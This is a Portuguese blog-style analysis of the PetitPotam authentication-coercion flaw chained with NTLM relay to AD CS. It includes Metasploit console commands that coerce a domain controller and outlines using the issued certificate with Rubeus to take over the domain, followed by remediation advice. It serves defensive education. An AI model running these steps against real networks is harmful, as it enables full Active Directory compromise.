Análise tecnica
PetitPotam não é uma vulnerabilidade de execução de código direta, mas uma falha lógica que permite a coerção de autenticação. Ele explora o protocolo Encrypting File System Remote (EFSRPC). Um atacante pode enviar uma chamada RPC EfsRpcOpenFileRaw para um servidor Windows (como um Controlador de Domínio), instruindo-o a se conectar a um caminho UNC especificado pelo atacante (ex: \IP_ATACANTEshare).
Isso força o DC a iniciar uma autenticação NTLM para a máquina do atacante. O perigo real surge quando combinado com ataques de NTLM Relay. Se o atacante retransmitir essa autenticação para um serviço que aceita NTLM e não requer assinatura (como o Active Directory Certificate Services – AD CS Web Enrollment), ele pode obter um certificado digital válido para o DC, permitindo a personificação completa do Controlador de Domínio e a extração de todos os segredos do AD.
Mapeamento e Exploração com Metasploit
- Módulo: auxiliary/scanner/smb/impacket/petitpotam
- Integração: Funciona em conjunto com módulos de captura ou ferramentas externas como ntlmrelayx.
Cenário de Exploração Detalhado:
- Configuração do Relay:
O atacante configura um servidor de relay (usando ferramentas externas integradas ou via proxy socks no Metasploit) apontando para o servidor AD CS da empresa (http://ca.empresa.local/certsrv). - Coerção:
Bashmsf6 > use auxiliary/scanner/smb/impacket/petitpotam
msf6 auxiliary(petitpotam) > set RHOSTS 192.168.10.5 (IP do DC)
msf6 auxiliary(petitpotam) > set LHOST 192.168.10.50 (IP do Atacante/Listener)
msf6 auxiliary(petitpotam) > run - Resultado:
O DC conecta-se ao IP do atacante. A autenticação é retransmitida para o AD CS. O AD CS emite um certificado Base64. O atacante usa esse certificado com ferramentas como Rubeus ou PKINIT tools para solicitar um Ticket Kerberos (TGT) para a conta do DC, assumindo controle total.40
Remediação e Defesa em Profundidade
- Desativação de NTLM no AD CS: A solução definitiva é desativar a autenticação NTLM nos serviços IIS do AD CS, exigindo Kerberos. Isso quebra o NTLM Relay.
- Extended Protection for Authentication (EPA): Habilitar EPA no IIS do AD CS para vincular a autenticação ao canal TLS, prevenindo relay.41
- Patching: A Microsoft lançou patches para bloquear a chamada EFSRPC anônima, mas variantes autenticadas ainda funcionam, tornando a configuração do AD CS a defesa primária.
Filtros RPC: Bloquear tráfego RPC para a interface EFSRPC em firewalls de host.
Apaixonado por tecnologia e segurança cibernética, com mais de 17 anos de experiencia na área atuando tecnicamente como Analista de Suporte de TI, Desenvolvedor, Infraetrutura e Segurança da Informação. Com sólida trajetória na área de Tecnologia da Informação e foco em Cibersegurança, dedico-me a identificar e mitigar vulnerabilidades críticas que ameaçam a continuidade de negócios, assim como atuo na governança baseada nos principais frameworks (ISO/IEC27001, ISO/IEC42000, NIST 800-115, PCIDSS etc.).
No responses yet